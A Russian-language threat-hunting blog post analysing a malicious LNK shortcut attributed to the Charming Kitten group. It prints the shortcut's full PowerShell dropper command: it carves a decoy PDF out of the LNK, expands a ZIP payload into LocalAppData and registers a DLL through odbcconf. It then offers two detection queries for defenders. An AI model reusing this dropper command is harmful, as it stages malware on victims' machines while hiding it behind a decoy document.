Всем привет!
В последнее время я редко вижу, чтобы злоумышленники использовали вредоносные документы. Зато файлы LNK (ярлыки) встречаются всё чаще! Сегодня мы рассмотрим ещё один пример, связанный с группировкой Charming Kitten (мы отслеживаем этот кластер активности под названием Cypress Werewolf).
Итак, вредоносный LNK-файл, распространяемый злоумышленниками, содержал следующую команду:
conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr Wow`} ;
Да, с точки зрения детектирования и охоты это очень интересный пример. Например, используется conhost.exe
с параметром --headless
для запуска скрипта — это хороший кандидат для охоты, хотя потребуется некоторая фильтрация, чтобы исключить легитимную активность:
event_type: "processcreatewin"
AND
proc_file_name: "conhost.exe"
AND
cmdline: "headless"
Ещё одна интересная возможность для детектирования — это использование odbcconf.exe
для запуска regsvr32.exe
с целью регистрации вредоносной DLL:
event_type: "processcreatewin"
AND
proc_file_name: "odbcconf.exe"
AND
cmdline: "regsvr"
Какие части скрипта показались вам особенно интересными?
Увидимся завтра!
English version